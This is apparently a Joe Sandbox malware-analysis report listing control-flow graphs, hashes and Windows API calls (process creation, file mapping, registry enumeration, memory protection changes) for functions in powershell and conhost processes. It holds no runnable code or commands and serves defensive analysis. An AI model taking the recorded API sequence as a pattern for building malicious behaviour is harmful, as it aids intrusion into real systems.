7ffd9bb724da-7ffd9bb724e7 425->431 426->425 432 7ffd9bb72503-7ffd9bb72578 431->432 433 7ffd9bb724e9-7ffd9bb724fc 431->433 432->287 438 7ffd9bb7257e-7ffd9bb7258b 432->438 433->432 439 7ffd9bb7258d-7ffd9bb725a0 438->439 440 7ffd9bb725a7-7ffd9bb72619 438->440 439->440 440->287 445 7ffd9bb7261f-7ffd9bb7262c 440->445 446 7ffd9bb7262e-7ffd9bb72641 445->446 447 7ffd9bb72648-7ffd9bb726b4 445->447 446->447 447->287 452 7ffd9bb726ba-7ffd9bb726c7 447->452 453 7ffd9bb726e3-7ffd9bb72753 452->453 454 7ffd9bb726c9-7ffd9bb726dc 452->454 453->287 454->453
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2594050157.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9bb70000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ecbc74dc8b045b81a69c437d0306206d5e85252b77ba66ad56abe2cc5ab141ab
                                                                                                    • Instruction ID: 749bcbadfba32c322b318c64af4a5ee657fdeb9dcdc487e0be470ecc7f41be93
                                                                                                    • Opcode Fuzzy Hash: ecbc74dc8b045b81a69c437d0306206d5e85252b77ba66ad56abe2cc5ab141ab
                                                                                                    • Instruction Fuzzy Hash: 64D2753120DA488FDB69EB2CC4A4E6577E1EFA9304B15459DD04ECB2A6DE31EC46CB81
                                                                                                    Function 00007FFD9BAAFEB1 Relevance: 1.9, APIs: 1, Instructions: 376processCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 458 7ffd9baafeb1-7ffd9baafebd 459 7ffd9baafec8-7ffd9baaff82 458->459 460 7ffd9baafebf-7ffd9baafec7 458->460 464 7ffd9baaffe0-7ffd9bab0012 459->464 465 7ffd9baaff84-7ffd9baaff93 459->465 460->459 470 7ffd9bab0070-7ffd9bab00c1 464->470 471 7ffd9bab0014-7ffd9bab0023 464->471 465->464 466 7ffd9baaff95-7ffd9baaff98 465->466 468 7ffd9baaff9a-7ffd9baaffad 466->468 469 7ffd9baaffd2-7ffd9baaffda 466->469 472 7ffd9baaffaf 468->472 473 7ffd9baaffb1-7ffd9baaffc4 468->473 469->464 481 7ffd9bab011f-7ffd9bab0150 470->481 482 7ffd9bab00c3-7ffd9bab00d2 470->482 471->470 474 7ffd9bab0025-7ffd9bab0028 471->474 472->473 473->473 475 7ffd9baaffc6-7ffd9baaffce 473->475 476 7ffd9bab002a-7ffd9bab003d 474->476 477 7ffd9bab0062-7ffd9bab006a 474->477 475->469 479 7ffd9bab003f 476->479 480 7ffd9bab0041-7ffd9bab0054 476->480 477->470 479->480 480->480 483 7ffd9bab0056-7ffd9bab005e 480->483 490 7ffd9bab015e-7ffd9bab01de CreateProcessA 481->490 491 7ffd9bab0152-7ffd9bab015a 481->491 482->481 484 7ffd9bab00d4-7ffd9bab00d7 482->484 483->477 485 7ffd9bab00d9-7ffd9bab00ec 484->485 486 7ffd9bab0111-7ffd9bab0119 484->486 488 7ffd9bab00f0-7ffd9bab0103 485->488 489 7ffd9bab00ee 485->489 486->481 488->488 492 7ffd9bab0105-7ffd9bab010d 488->492 489->488 493 7ffd9bab01e6-7ffd9bab0223 call 7ffd9bab023f 490->493 494 7ffd9bab01e0 490->494 491->490 492->486 497 7ffd9bab0225 493->497 498 7ffd9bab022a-7ffd9bab023d 493->498 494->493 497->498
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2591755928.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9baa0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 963392458-0
                                                                                                    • Opcode ID: 37a8a6efb9f52cff1fb929b70c46addd41bdd3821ac78d01a4e8a63d454a38a1
                                                                                                    • Instruction ID: 64fa2661e132855ef5385276c5eae12110aad297bdd8cf392c91c8c10cbfd41c
                                                                                                    • Opcode Fuzzy Hash: 37a8a6efb9f52cff1fb929b70c46addd41bdd3821ac78d01a4e8a63d454a38a1
                                                                                                    • Instruction Fuzzy Hash: 6BC1B330A18A8D8FDB78DF28C8567E977D1FB58710F10422EE85EC7291DF74A5858B82
                                                                                                    Function 00007FFD9BAAF070 Relevance: 1.9, APIs: 1, Instructions: 370COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 499 7ffd9baaf070-7ffd9baaff82 505 7ffd9baaffe0-7ffd9bab0012 499->505 506 7ffd9baaff84-7ffd9baaff93 499->506 511 7ffd9bab0070-7ffd9bab00c1 505->511 512 7ffd9bab0014-7ffd9bab0023 505->512 506->505 507 7ffd9baaff95-7ffd9baaff98 506->507 509 7ffd9baaff9a-7ffd9baaffad 507->509 510 7ffd9baaffd2-7ffd9baaffda 507->510 513 7ffd9baaffaf 509->513 514 7ffd9baaffb1-7ffd9baaffc4 509->514 510->505 522 7ffd9bab011f-7ffd9bab0150 511->522 523 7ffd9bab00c3-7ffd9bab00d2 511->523 512->511 515 7ffd9bab0025-7ffd9bab0028 512->515 513->514 514->514 516 7ffd9baaffc6-7ffd9baaffce 514->516 517 7ffd9bab002a-7ffd9bab003d 515->517 518 7ffd9bab0062-7ffd9bab006a 515->518 516->510 520 7ffd9bab003f 517->520 521 7ffd9bab0041-7ffd9bab0054 517->521 518->511 520->521 521->521 524 7ffd9bab0056-7ffd9bab005e 521->524 531 7ffd9bab015e-7ffd9bab01de CreateProcessA 522->531 532 7ffd9bab0152-7ffd9bab015a 522->532 523->522 525 7ffd9bab00d4-7ffd9bab00d7 523->525 524->518 526 7ffd9bab00d9-7ffd9bab00ec 525->526 527 7ffd9bab0111-7ffd9bab0119 525->527 529 7ffd9bab00f0-7ffd9bab0103 526->529 530 7ffd9bab00ee 526->530 527->522 529->529 533 7ffd9bab0105-7ffd9bab010d 529->533 530->529 534 7ffd9bab01e6-7ffd9bab0223 call 7ffd9bab023f 531->534 535 7ffd9bab01e0 531->535 532->531 533->527 538 7ffd9bab0225 534->538 539 7ffd9bab022a-7ffd9bab023d 534->539 535->534 538->539
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2591755928.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9baa0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ea7f2fcfb7273c445489babdc1b1899a7e4f578c1a56c2008d20b997b07b53b7
                                                                                                    • Instruction ID: 47560529c6dbe11afad3258d2b1da03baaf7b5745bafb11ffc265df465a77487
                                                                                                    • Opcode Fuzzy Hash: ea7f2fcfb7273c445489babdc1b1899a7e4f578c1a56c2008d20b997b07b53b7
                                                                                                    • Instruction Fuzzy Hash: 7DC1D430A18A4D8FDB78DF68C8567E977D1FB58710F10422EE85EC3291DF74A9858B82
                                                                                                    Function 00007FFD9BAAF080 Relevance: 1.9, APIs: 1, Instructions: 365COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 540 7ffd9baaf080-7ffd9baaff82 545 7ffd9baaffe0-7ffd9bab0012 540->545 546 7ffd9baaff84-7ffd9baaff93 540->546 551 7ffd9bab0070-7ffd9bab00c1 545->551 552 7ffd9bab0014-7ffd9bab0023 545->552 546->545 547 7ffd9baaff95-7ffd9baaff98 546->547 549 7ffd9baaff9a-7ffd9baaffad 547->549 550 7ffd9baaffd2-7ffd9baaffda 547->550 553 7ffd9baaffaf 549->553 554 7ffd9baaffb1-7ffd9baaffc4 549->554 550->545 562 7ffd9bab011f-7ffd9bab0150 551->562 563 7ffd9bab00c3-7ffd9bab00d2 551->563 552->551 555 7ffd9bab0025-7ffd9bab0028 552->555 553->554 554->554 556 7ffd9baaffc6-7ffd9baaffce 554->556 557 7ffd9bab002a-7ffd9bab003d 555->557 558 7ffd9bab0062-7ffd9bab006a 555->558 556->550 560 7ffd9bab003f 557->560 561 7ffd9bab0041-7ffd9bab0054 557->561 558->551 560->561 561->561 564 7ffd9bab0056-7ffd9bab005e 561->564 571 7ffd9bab015e-7ffd9bab01de CreateProcessA 562->571 572 7ffd9bab0152-7ffd9bab015a 562->572 563->562 565 7ffd9bab00d4-7ffd9bab00d7 563->565 564->558 566 7ffd9bab00d9-7ffd9bab00ec 565->566 567 7ffd9bab0111-7ffd9bab0119 565->567 569 7ffd9bab00f0-7ffd9bab0103 566->569 570 7ffd9bab00ee 566->570 567->562 569->569 573 7ffd9bab0105-7ffd9bab010d 569->573 570->569 574 7ffd9bab01e6-7ffd9bab0223 call 7ffd9bab023f 571->574 575 7ffd9bab01e0 571->575 572->571 573->567 578 7ffd9bab0225 574->578 579 7ffd9bab022a-7ffd9bab023d 574->579 575->574 578->579
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2591755928.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9baa0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 031c526a290e199991841d56e9987f7567436fd5d6c06b66462e136ac3f32132
                                                                                                    • Instruction ID: 3f6203cfdbee5eef6802870cdb7ea22e9ce53913eed894b78e3214b54d9f024b
                                                                                                    • Opcode Fuzzy Hash: 031c526a290e199991841d56e9987f7567436fd5d6c06b66462e136ac3f32132
                                                                                                    • Instruction Fuzzy Hash: 23B1C330A18A4D8FDB78DF28C8567E977D1FB58710F10422EE85EC3291DB74A9858B82
                                                                                                    Function 00007FFD9BAAE54E Relevance: 1.7, APIs: 1, Instructions: 243COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 580 7ffd9baae54e-7ffd9baae55b 581 7ffd9baae566-7ffd9baae62f 580->581 582 7ffd9baae55d-7ffd9baae565 580->582 586 7ffd9baae68a-7ffd9baae707 CreateFileMappingW 581->586 587 7ffd9baae631-7ffd9baae640 581->587 582->581 592 7ffd9baae709 586->592 593 7ffd9baae70f-7ffd9baae74b call 7ffd9baae767 586->593 587->586 588 7ffd9baae642-7ffd9baae645 587->588 590 7ffd9baae647-7ffd9baae65a 588->590 591 7ffd9baae67f-7ffd9baae687 588->591 594 7ffd9baae65c 590->594 595 7ffd9baae65e-7ffd9baae671 590->595 591->586 592->593 600 7ffd9baae74d 593->600 601 7ffd9baae752-7ffd9baae765 593->601 594->595 595->595 596 7ffd9baae673-7ffd9baae67b 595->596 596->591 600->601
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2591755928.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9baa0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFileMapping
                                                                                                    • String ID:
                                                                                                    • API String ID: 524692379-0
                                                                                                    • Opcode ID: 73fc1ebabf7d8031e6d46da7dd562d2badde65640031f97a7ee2afeaedac72de
                                                                                                    • Instruction ID: 3f00581da6813087d084877a503b95537ed613215d5eb7275fef6f91f5b3e30d
                                                                                                    • Opcode Fuzzy Hash: 73fc1ebabf7d8031e6d46da7dd562d2badde65640031f97a7ee2afeaedac72de
                                                                                                    • Instruction Fuzzy Hash: 23711530608B8D4FDB69DF28CC557E57BE1FF59310F14426EE84DC72A2CA74A8418B92
                                                                                                    Function 00007FFD9BAAE2EC Relevance: 1.7, APIs: 1, Instructions: 232fileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 602 7ffd9baae2ec-7ffd9baae2f3 603 7ffd9baae2f5-7ffd9baae2fd 602->603 604 7ffd9baae2fe-7ffd9baae394 602->604 603->604 608 7ffd9baae408-7ffd9baae4a0 CreateFileA 604->608 609 7ffd9baae396-7ffd9baae3be 604->609 612 7ffd9baae4a8-7ffd9baae4e4 call 7ffd9baae500 608->612 613 7ffd9baae4a2 608->613 609->608 614 7ffd9baae3c0-7ffd9baae3c3 609->614 623 7ffd9baae4e6 612->623 624 7ffd9baae4eb-7ffd9baae4ff 612->624 613->612 615 7ffd9baae3c5-7ffd9baae3d8 614->615 616 7ffd9baae3fd-7ffd9baae405 614->616 618 7ffd9baae3dc-7ffd9baae3ef 615->618 619 7ffd9baae3da 615->619 616->608 618->618 621 7ffd9baae3f1-7ffd9baae3f9 618->621 619->618 621->616 623->624
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2591755928.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9baa0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 858fdbad393d3cfb3bdd7aae07d72ccd1a5f8b857828c4d81bf63be232a33bbb
                                                                                                    • Instruction ID: 44598ee97e56f14630ab075e570d8eec6eb67ded3768ae20d1f34cb4450a88ba
                                                                                                    • Opcode Fuzzy Hash: 858fdbad393d3cfb3bdd7aae07d72ccd1a5f8b857828c4d81bf63be232a33bbb
                                                                                                    • Instruction Fuzzy Hash: 3771F730A08B4D4FDB68EF68D8567E877E1FF59310F10426EE84DC7292CA75E9418B91
                                                                                                    Function 00007FFD9BAAE7B6 Relevance: 1.6, APIs: 1, Instructions: 135fileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 625 7ffd9baae7b6-7ffd9baae7c3 626 7ffd9baae7c5-7ffd9baae7cd 625->626 627 7ffd9baae7ce-7ffd9baae7df 625->627 626->627 628 7ffd9baae7ea-7ffd9baae8a1 MapViewOfFile 627->628 629 7ffd9baae7e1-7ffd9baae7e9 627->629 633 7ffd9baae8a9-7ffd9baae8c6 628->633 634 7ffd9baae8a3 628->634 629->628 634->633
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2591755928.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9baa0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileView
                                                                                                    • String ID:
                                                                                                    • API String ID: 3314676101-0
                                                                                                    • Opcode ID: 2d44d4f394c349b81c55665fdd8cd8f456f9244849f9dd63b7b40d9be5122a8c
                                                                                                    • Instruction ID: 873d3b7992a81da845a1b3b59deb7f81b3d129e967c58339c6aed7c972cf7837
                                                                                                    • Opcode Fuzzy Hash: 2d44d4f394c349b81c55665fdd8cd8f456f9244849f9dd63b7b40d9be5122a8c
                                                                                                    • Instruction Fuzzy Hash: 01412B3190CA889FDB1DDBA8D8156E97BF1FF56321F14026ED049D3192DB647412C791
                                                                                                    Function 00007FFD9BAAE1E8 Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 635 7ffd9baae1e8-7ffd9baae1ef 636 7ffd9baae1fa-7ffd9baae2b0 K32GetModuleInformation 635->636 637 7ffd9baae1f1-7ffd9baae1f9 635->637 641 7ffd9baae2b8-7ffd9baae2e7 636->641 642 7ffd9baae2b2 636->642 637->636 642->641
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2591755928.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9baa0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InformationModule
                                                                                                    • String ID:
                                                                                                    • API String ID: 3425974696-0
                                                                                                    • Opcode ID: c38777687b9a1a412c626f10eb331269d67e976e08026b8cb694ed31892b49bd
                                                                                                    • Instruction ID: a6309eae124b2b29568889a82e765d98e525f9dedfb672897dc20ad746d7d1f3
                                                                                                    • Opcode Fuzzy Hash: c38777687b9a1a412c626f10eb331269d67e976e08026b8cb694ed31892b49bd
                                                                                                    • Instruction Fuzzy Hash: 75310631D0CA5C8FDB18DB9C984A6F9BBE1EF69321F04426FD049D3292DB756806C791
                                                                                                    Function 00007FFD9BAACBF0 Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 644 7ffd9baacbf0-7ffd9baae2b0 K32GetModuleInformation 650 7ffd9baae2b8-7ffd9baae2e7 644->650 651 7ffd9baae2b2 644->651 651->650
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2591755928.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9baa0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InformationModule
                                                                                                    • String ID:
                                                                                                    • API String ID: 3425974696-0
                                                                                                    • Opcode ID: 727ec0f0e19b413a4e648ef91081b4d2f30b51444cf54563ae931e14d6d66dba
                                                                                                    • Instruction ID: 7edc50e246fd7e2d273a4a2e2fa6b022294b7ef64751adfd27429f0d801f607b
                                                                                                    • Opcode Fuzzy Hash: 727ec0f0e19b413a4e648ef91081b4d2f30b51444cf54563ae931e14d6d66dba
                                                                                                    • Instruction Fuzzy Hash: 6C31C731A0CA1C8FDB18DB9C98496F9BBE1EB59325F10423ED04DD3292DB75A8568781
                                                                                                    Function 00007FFD9BD21FF8 Relevance: .1, Instructions: 124COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2605494338.00007FFD9BD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BD20000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9bd20000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f19c74062501cb5b362ec5d2a28abdc5306a58c9097e22e5dcbdd08bcf043b9c
                                                                                                    • Instruction ID: 4eae23aa56a6df2fdedf1a236c7a22e411f712f94d43976391727a87af4c66ee
                                                                                                    • Opcode Fuzzy Hash: f19c74062501cb5b362ec5d2a28abdc5306a58c9097e22e5dcbdd08bcf043b9c
                                                                                                    • Instruction Fuzzy Hash: FD31EA22B0DA5D0FEBBCDDAC64619F863D2DF99720B5511BBE51EC31D6DD18AD018380
                                                                                                    Function 00007FFD9BB729D5 Relevance: .0, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2594050157.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9bb70000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d969ca7188890bf7765ffc13f31795f7e4f9fe564676fea3096529d9da6a81d4
                                                                                                    • Instruction ID: 693d79d10a4ec4ce55ab59c3eb1bab65c59360a134ce6a16c90426f1b2c124de
                                                                                                    • Opcode Fuzzy Hash: d969ca7188890bf7765ffc13f31795f7e4f9fe564676fea3096529d9da6a81d4
                                                                                                    • Instruction Fuzzy Hash: EBE0D86370F9CD4FD7A4AAAC14681A877D0EF9A65531540FBE04DC71E3DD585C0D4300
                                                                                                    Function 00007FFD9BCC8ABD Relevance: .0, Instructions: 21COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2603418706.00007FFD9BCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BCC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9bcc0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 209aacfdebc855e70cb34f166c4a8dc9bb4976d94ad3443e379dbffec0d97a6b
                                                                                                    • Instruction ID: daa1b3a18643ae265cbf3a850c79729eed0c8d3e759e028ecff811628de13432
                                                                                                    • Opcode Fuzzy Hash: 209aacfdebc855e70cb34f166c4a8dc9bb4976d94ad3443e379dbffec0d97a6b
                                                                                                    • Instruction Fuzzy Hash: 22D0A92274C80D8F8F48E90CEC92CF973D1E7A877071402ABE80AC3284CD22E88287C0

                                                                                                    Executed Functions

                                                                                                    Function 000001C08C1B3458 Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                    • String ID:
                                                                                                    • API String ID: 1683269324-0
                                                                                                    • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                                    • Instruction ID: 78e3d66f629b725962b868081889b28922997f6670c9d2125ea74b13ef9a4a59
                                                                                                    • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                                    • Instruction Fuzzy Hash: B011A130ED4611C1FF27A720B4CAFD962B0BB4EF24F84C024A90A85194EF3DC8648B14
                                                                                                    Function 000001C08C1B1C28 Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 000001C08C1B1650: GetProcessHeap.KERNEL32 ref: 000001C08C1B165B
                                                                                                      • Part of subcall function 000001C08C1B1650: HeapAlloc.KERNEL32 ref: 000001C08C1B166A
                                                                                                      • Part of subcall function 000001C08C1B1650: RegOpenKeyExW.ADVAPI32 ref: 000001C08C1B16DA
                                                                                                      • Part of subcall function 000001C08C1B1650: RegOpenKeyExW.ADVAPI32 ref: 000001C08C1B1707
                                                                                                      • Part of subcall function 000001C08C1B1650: RegCloseKey.ADVAPI32 ref: 000001C08C1B1721
                                                                                                      • Part of subcall function 000001C08C1B1650: RegOpenKeyExW.ADVAPI32 ref: 000001C08C1B1741
                                                                                                      • Part of subcall function 000001C08C1B1650: RegCloseKey.ADVAPI32 ref: 000001C08C1B175C
                                                                                                      • Part of subcall function 000001C08C1B1650: RegOpenKeyExW.ADVAPI32 ref: 000001C08C1B177C
                                                                                                      • Part of subcall function 000001C08C1B1650: RegCloseKey.ADVAPI32 ref: 000001C08C1B1797
                                                                                                      • Part of subcall function 000001C08C1B1650: RegOpenKeyExW.ADVAPI32 ref: 000001C08C1B17B7
                                                                                                      • Part of subcall function 000001C08C1B1650: RegCloseKey.ADVAPI32 ref: 000001C08C1B17D2
                                                                                                      • Part of subcall function 000001C08C1B1650: RegOpenKeyExW.ADVAPI32 ref: 000001C08C1B17F2
                                                                                                    • Sleep.KERNEL32 ref: 000001C08C1B1C43
                                                                                                    • SleepEx.KERNELBASE ref: 000001C08C1B1C49
                                                                                                      • Part of subcall function 000001C08C1B1650: RegCloseKey.ADVAPI32 ref: 000001C08C1B180D
                                                                                                      • Part of subcall function 000001C08C1B1650: RegOpenKeyExW.ADVAPI32 ref: 000001C08C1B182D
                                                                                                      • Part of subcall function 000001C08C1B1650: RegCloseKey.ADVAPI32 ref: 000001C08C1B1848
                                                                                                      • Part of subcall function 000001C08C1B1650: RegOpenKeyExW.ADVAPI32 ref: 000001C08C1B1868
                                                                                                      • Part of subcall function 000001C08C1B1650: RegCloseKey.ADVAPI32 ref: 000001C08C1B1883
                                                                                                      • Part of subcall function 000001C08C1B1650: RegOpenKeyExW.ADVAPI32 ref: 000001C08C1B18A3
                                                                                                      • Part of subcall function 000001C08C1B1650: RegCloseKey.ADVAPI32 ref: 000001C08C1B18BE
                                                                                                      • Part of subcall function 000001C08C1B1650: RegCloseKey.ADVAPI32 ref: 000001C08C1B18C8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 1534210851-0
                                                                                                    • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                                    • Instruction ID: 68ceee461f84b91ee897fb2f3fd1fd013f45c2be58136839a5f77f4a6f83e860
                                                                                                    • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                                    • Instruction Fuzzy Hash: 0D312335A80A01D1FF529F36D6E8BDA92B4AB4EFE0F25D421DE0987795DE24CC608A50
                                                                                                    Function 000001C08C182908 Relevance: 1.7, APIs: 1, Instructions: 186libraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622576710.000001C08C180000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C08C180000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c180000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad
                                                                                                    • String ID:
                                                                                                    • API String ID: 1029625771-0
                                                                                                    • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                                    • Instruction ID: 574058dba5a5ce5790424de62c53ed01ec80c47c7b8ef65667ae4150bf08fe0c
                                                                                                    • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                                    • Instruction Fuzzy Hash: F9610F72B46652C7FEAACF15D480BA8B3A1FB0AF95F54C031DA1907B85DB38E852C700

                                                                                                    Non-executed Functions

                                                                                                    Function 000001C08C1B2CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
